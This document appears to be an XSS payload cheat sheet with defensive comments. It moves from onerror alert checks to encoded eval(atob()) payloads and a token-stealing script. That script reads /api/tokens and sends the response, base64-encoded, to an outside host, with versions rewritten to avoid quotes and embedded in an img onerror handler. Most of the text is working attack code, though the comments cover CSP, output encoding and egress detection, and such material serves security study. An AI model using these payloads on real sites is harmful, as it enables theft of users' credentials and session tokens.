
XSS

example 1

<!-- Execution check only: src='#' resolves to the current page rather than an image,
     so the load fails and the inline onerror handler runs alert(1).
     If markup like this is rendered unescaped, the fix is context-aware output encoding
     (or an allow-list sanitiser that drops on* attributes). A Content-Security-Policy
     whose script-src omits 'unsafe-inline' also keeps inline handlers from running. -->
<img src='#' onerror='alert(1)' />

<!-- Same check with the call wrapped in an immediately-invoked function;
     both the function and the handler return false. -->
<img src='#' onerror='(function(){alert(1);return false;})();return false;' />
// Proof-of-concept script: sends a same-origin GET to /api/tokens and shows the
// response body in an alert once the request has loaded.
// xhttp is assigned without a declaration, so in non-strict code it is an implicit global.
// NOTE(review): a same-origin XMLHttpRequest carries the user's cookies by default, so
// HttpOnly on the session cookie does not protect whatever /api/tokens returns once
// script runs in the page. Confirm how that endpoint authenticates.
xhttp = new XMLHttpRequest(); 
xhttp.onload = function(){alert(this.responseText)}; xhttp.open('GET','/api/tokens');  
xhttp.send();
// Templates: the dots stand in for a base64 string; atob() decodes it and eval() runs
// the result as script. The three lines are the same call written with double quotes,
// single quotes and backticks.
// Defender's view: the decoded script never appears as plain text in the input, so
// keyword matching on the raw value does not see it. A Content-Security-Policy whose
// script-src omits 'unsafe-eval' makes eval() throw instead of running the string.
eval(atob(".................."));
eval(atob('..................'));
eval(atob(`..................`));
<!-- Inline onerror handler that evals a base64 string. The string appears to decode to
     the XMLHttpRequest script earlier in this example (GET /api/tokens, alert the response).
     Encoding the value on output stops it at the source. A script-src without
     'unsafe-inline' blocks the handler, and without 'unsafe-eval' blocks the eval call. -->
<img src=0 onerror='eval(atob(`eGh0dHAgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTsgCnhodHRwLm9ubG9hZCA9IGZ1bmN0aW9uKCl7YWxlcnQodGhpcy5yZXNwb25zZVRleHQpfTsgeGh0dHAub3BlbignR0VUJywnL2FwaS90b2tlbnMnKTsgIAp4aHR0cC5zZW5kKCk7`))'/>

example 2

// Two chained requests: `a` reads /api/tokens from the page's own origin, and its onload
// handler uses `b` to send that response, base64-encoded, as the query string of a GET
// to a different host. Both variables are implicit globals (no declaration).
// Defender's view: the second request is cross-origin, so a Content-Security-Policy
// connect-src limited to the application's own origins would block it. In proxy or
// egress logs it shows up as a GET to an unfamiliar host with a long base64 query string.
a = new XMLHttpRequest(); 
a.onload = function(){
    // Runs after /api/tokens has responded; this.responseText is that response body.
    b = new XMLHttpRequest();
    // Protocol-relative URL: the request uses the same scheme as the page it runs in.
    b.open('GET','//michalszalkowski.com?'+btoa(this.responseText)); 
    b.send();
}; 
a.open('GET','/api/tokens');
// Custom header on the same-origin request. NOTE(review): it looks like a marker only;
// nothing visible here depends on it, but it would be visible in server-side request logs.
a.setRequestHeader('Hacker', 'Szalek');
a.send();

// The same two-request script written as one expression: statements are joined with the
// comma operator and every string uses backticks, so the line contains no single or
// double quotes. The requests it makes are unchanged: GET /api/tokens, then a GET to the
// external host with the base64-encoded response as the query string.
(a=new XMLHttpRequest).onload=function(){(b=new XMLHttpRequest).open(`GET`,`//michalszalkowski.com?`+btoa(this.responseText)),b.send()},a.open(`GET`,`/api/tokens`),a.setRequestHeader(`Hacker`,`Szalek`),a.send()
<!-- The single-expression script placed in an inline onerror handler.
     Mitigations are the same as for any injected attribute script: encode the value for
     its output context, and serve a Content-Security-Policy whose script-src omits
     'unsafe-inline' and whose connect-src lists only the application's own origins.
     The outbound GET with a base64 query string is the observable network trace. -->
<img src=0 onerror='(a=new XMLHttpRequest).onload=function(){(b=new XMLHttpRequest).open(`GET`,`//michalszalkowski.com?`+btoa(this.responseText)),b.send()},a.open(`GET`,`/api/tokens`),a.setRequestHeader(`Hacker`,`Szalek`),a.send()'/>